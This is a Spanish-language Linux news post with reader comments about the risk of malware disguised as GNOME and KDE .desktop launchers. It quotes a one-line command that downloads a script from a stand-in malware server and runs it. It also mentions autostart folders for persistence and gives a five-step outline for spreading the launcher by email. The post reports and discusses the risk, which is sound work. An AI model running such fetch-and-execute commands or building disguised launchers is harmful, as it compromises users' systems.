Si algunos de nuestros foros, manuales, ALDOS, paquetería o proyectos te han resultado de ayuda, apreciaremos mucho nos apoyes con un donativo.

Amenazas de virus para GNOME y KDE.

foobar publicó recientemente en su bitácora personal un artículo titulado Cómo escribir un virus para Linux en 5 segundos, detallando la infección con equipamiento lógico maligno (malware) a través del formato de los archivos .desktop que utilizan GNOME y KDE. Aunque esto está lejos de ser una nueva amenaza, es un riesgo potencial, como fue discutido en 2006, que a la fecha carece de una solución para lidiar con el problema.

Linux Weekly News está discutiendo de manera amplia el problema, que de cierta manera permite a un atacante disfrazar un archivo .desktop con el icono de Inicio o cualquier programa. Básicamente el artículo de foobar sugiere explotar la confianza que tiene los usuarios de GNU/Linux en el sistemas, pero sin subestimarlos, utilizando archivos .desktop que se disfrazan con iconos de otras aplicaciones y que ejecutan guiones remotos, como el siguiente ejemplo:

% bash -c "curl http://www.some_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py"

El artículo también sugiere utilizar ~/.config/autostart y ~/.kde/Autostart para asegurarse que el guión se ejecute automáticamente en cada inicio de sesión.

La guía resumida, sugiere lo siguiente:

  1. Escribir un código a la elección del atacante.
  2. Implementar en éste último la capacidad de instalarse e iniciarse a si mismo.
  3. Crear un archivo lanzador de escritorio para ejecutar el código.
  4. Adjuntar el código a un correo electrónico.
  5. Enviar el correo electrónico a cuantas direcciones de correo se pueda.

Todo esto ha puesto en alerta a muchos desarrolladores, que ahora comienzan a pensar y preocuparse de las medidas a utilizar. Este es posiblemente una buena excusa para volver a reactivar SELinux en los escritorios donde fue desactivado para mejorar rendimiento y comenzar a pensar como implementar un antivirus del mismo modo que se hace en Windows, solo por sanidad mental. En fin, los desarrolladores han vuelto a tocar el tema y es casi seguro que se hará algo al respecto en el futuro cercano (la menos eso esperamos).

Fuente: Slashdot.


Atención: Salvo que se indique lo contrario, la licencia del texto de este documento es Creative Commons Reconocimiento 2.5, mediante la cual usted tiene permitido copiar, modificar, comunicar y distribuir el contenido de este texto, de manera total o parcial, y publicarlo o difundirlo en cualquier otro sitio de Internet o medio de comunicaciòn, siempre y cuando incluya o cite (1)el nombre de este sitio de Internet, (2)enlace permanente de este documento, (3)nombre del autor y (4)la misma licencia de distribución.

Opciones: Imprimir | Recomendar | Enlace permanente

Twitter Facebook Google Bookmarks Bitacoras.com Wikio Menéame Technorati Bloglines Digg Yahoo Buzz

Seguimientos (Trackback)

URL de seguimiento para esta entrada:
http://www.alcancelibre.org/trackback.php/amenazas-de-virus-para-gnome-y-kde
Agregar comentario

Los siguientes comentarios son de la persona que los haya enviado. Este sitio se deslinda de cualquier responsabilidad respecto de las opiniones expresadas por los participantes en nuestros foros y secciones de comentarios, y el hecho de publicar las mismas no significa que se esté de acuerdo con éstas.

  • Amenazas de virus para GNOME y KDE.
  • Escrito por:Will Lpz Jimnz el  17/02/2009, 23:37
Virus ?? -.. en gnome y KDE ?? ...

Vaya .. este tipo de cosas me dan alergia saber que hay personas sin nada que hacer de provecho y se dedican solo a hacer este tipo de cosas ..

cual es la *inche envidia que le tiene a linux de que no haya linux, en que le beneficia hacer este tipo de cosas, por que ? no se ... solo este tipo de personas con pensamientos de "mira jaja soy bueno cree un virus en linux" .. que  no le vasta saber que hay miles de virus para windows ... hello !!!



* mil disculpa por la expresión ..

---
.:: Cuando el Alumno esta listo, el maestro aparece ::.
[[http://www.koalasoftmx.net ::BLog::]]

  • Amenazas de virus para GNOME y KDE.
  • Escrito por:Gerardo Juarez el  18/02/2009, 02:42
La diferencia aqui es que la vulnerabilidad se conoce publicamente. El codigo esta abierto para que cualquiera que pueda verlo y sugerir una correccion.